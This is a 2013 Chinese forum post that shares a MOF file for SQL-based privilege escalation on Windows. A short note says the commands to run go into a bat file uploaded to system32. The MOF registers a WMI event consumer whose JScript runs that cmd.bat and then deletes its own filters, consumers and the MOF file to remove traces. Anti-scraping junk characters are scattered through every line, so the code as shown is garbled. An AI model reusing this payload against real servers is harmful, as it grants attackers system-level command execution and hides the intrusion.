这个sql提权MOF需要运行 system下的文件,不能定义路径。
8 d1 Y# v4 \& S% y+ G需要将要运行的命令写入到bat上传到system32目录,然后执行。$ W* E1 a1 d2 V5 v. R0 A
0 M3 O* O, ^8 W1 D
这个sql提权MOF需要运行 system下的文件,不能定义路径。! [$ T3 l [, s' P8 W5 b/ k
需要将要运行的命令写入到bat上传到system32目录,然后执行。
3 E; V6 w6 g+ `( p& u4 G* s0 q3 e+ v- L! \7 E2 h' E
#pragma
. u; H& M# g' y& I! n namespace("\\\\.\\root\\cimv2"): e2 j0 ~5 _1 J9 b, F
class
) Z; m3 N. H& g( W" g* Z! \% V. O MyClass547' J* S3 g; m' w3 q' o8 u9 i
{ [key]
( S3 ?2 R2 i) C& X D8 q string! p8 \8 Z, X6 e- F6 z! y: `: P4 B
Name;2 B+ q P8 k- V, s0 A1 ~/ _$ V: ^2 B
};
8 p, k$ `. v7 R. D3 C class
- u( C9 T4 k5 y, ?5 F9 q8 Y ActiveScriptEventConsumer3 ?9 r* Z4 \; c6 l
: __EventConsumer { [key]
* ?, }! {# Z8 U5 p string
" k) r; M+ D9 Z( s6 w Name; [not_null]+ ~, l2 M3 T' {9 N; W+ o
string
B; b4 @0 |( k& q; c: F9 { ScriptingEngine; string/ ]* L) k8 |$ ?' W9 Y- @2 O
ScriptFileName; [template]. V- R& w" |; d
string. x# p9 p+ e' `
ScriptText; uint32 KillTimeout;
3 d: Y( s- P o& J& R2 S4 S. c# a }; instance of __Win32Provider as $P {
( L7 R2 j, x: D" J Name& W( a- H9 ~; Y9 f
=4 `: k9 t! Y! [$ U# y* K
"ActiveScriptEventConsumer"; CLSID =
; s( r: U1 u# K) z: [: { "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
* n$ @4 M) _( S- L3 G! V6 @ PerUserInitialization+ D" Q& n6 ~! j* q) n
= TRUE;
% n8 E! W( [' R" a% U3 w- q5 X }; instance of __EventConsumerProviderRegistration { Provider
2 H: v$ B( X2 d* l- n; M' S0 @ = $P; ConsumerClassNames
, n2 r7 I l0 C. ?1 E' k = l3 n" n7 i+ i' J
{"ActiveScriptEventConsumer"};& H9 P% F* Z0 O, Q* b: M
};
6 |/ h0 K3 \+ F1 a( G( I8 [# C Instance of ActiveScriptEventConsumer, U. d: B# i2 N+ j4 x
as $cons { Name
6 _$ y! S% e. g8 l =% ?" ~4 T i, f9 f0 m0 h( x
"ASEC"; ScriptingEngine
$ W8 X$ G, `/ I$ i! g$ V; r8 D =* E! m: Q: }! d) J, L. n
"JScript"; ScriptText3 a- P$ t: [9 I& r7 @) S' n4 J
=
% F1 J6 g/ |5 t "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };. C3 W5 E% c- L7 f3 B
Instance of ActiveScriptEventConsumer
2 F/ ^1 X/ v, v5 B" S8 F( r, ~ as $cons2 { Name
. i) o0 u W. @4 O( b5 e =
0 O$ r* K3 k0 X/ H6 J7 e "qndASEC"; ScriptingEngine$ u& L5 O) p9 b, S
=& W7 F% d' a1 G6 x% Y
"JScript"; ScriptText
. q) k8 I" Y% Q$ E- E =1 p5 B' D2 g: i8 ^
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";% v8 k$ W* y7 A0 L
}; instance of __EventFilter as $Filt { Name
7 [0 P, o# `8 u2 L! Y6 e& I =7 A$ x X5 Q& ?/ e: D
"instfilt"; Query
# L' q6 t6 t) _& u/ F( K =3 ~+ }: O5 S, P" k
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage2 y9 a0 @$ S+ m( U" ^
=
, j( P9 {% ?; u8 ]6 D/ X. w) u "WQL"; }; instance of __EventFilter as $Filt2 { Name* o9 L# t/ `1 S" x: H3 X$ J
=
: R7 k3 }2 G. n: N8 o6 a8 X "qndfilt"; Query
# W2 i7 T/ B) h' ?: K2 f* _$ T =
! J& W: @% j; L3 @( J* D "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage6 O0 i& I2 o5 n/ n& z: p+ A
=6 D6 Y. n( U9 d6 q" b3 Q; i( Z
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
( u7 g4 D, c2 { T) S9 {9 b = $cons; Filter8 |7 a# h5 X# J' Z l& M
= $Filt;
3 O6 W6 D/ e- ^: e7 I# ?, m }; instance of __FilterToConsumerBinding as $bind2 { Consumer
/ p- ~& Q F! N- m = $cons2; Filter
5 D+ y; U+ N& I/ Z+ { = $Filt2;
: a& R) o& A7 Z( W5 c }; instance of MyClass547
4 k9 f* y. }" C as $MyClass { Name& D {: ~4 ~; J, I4 C" V" [
=6 S/ R7 l% s* x+ b& g0 I- ^
"ClassConsumer";
$ T' l; A2 ], f: A6 ]7 s) s }; |
发表于 2013-2-14 00:05:02
收藏
支持
反对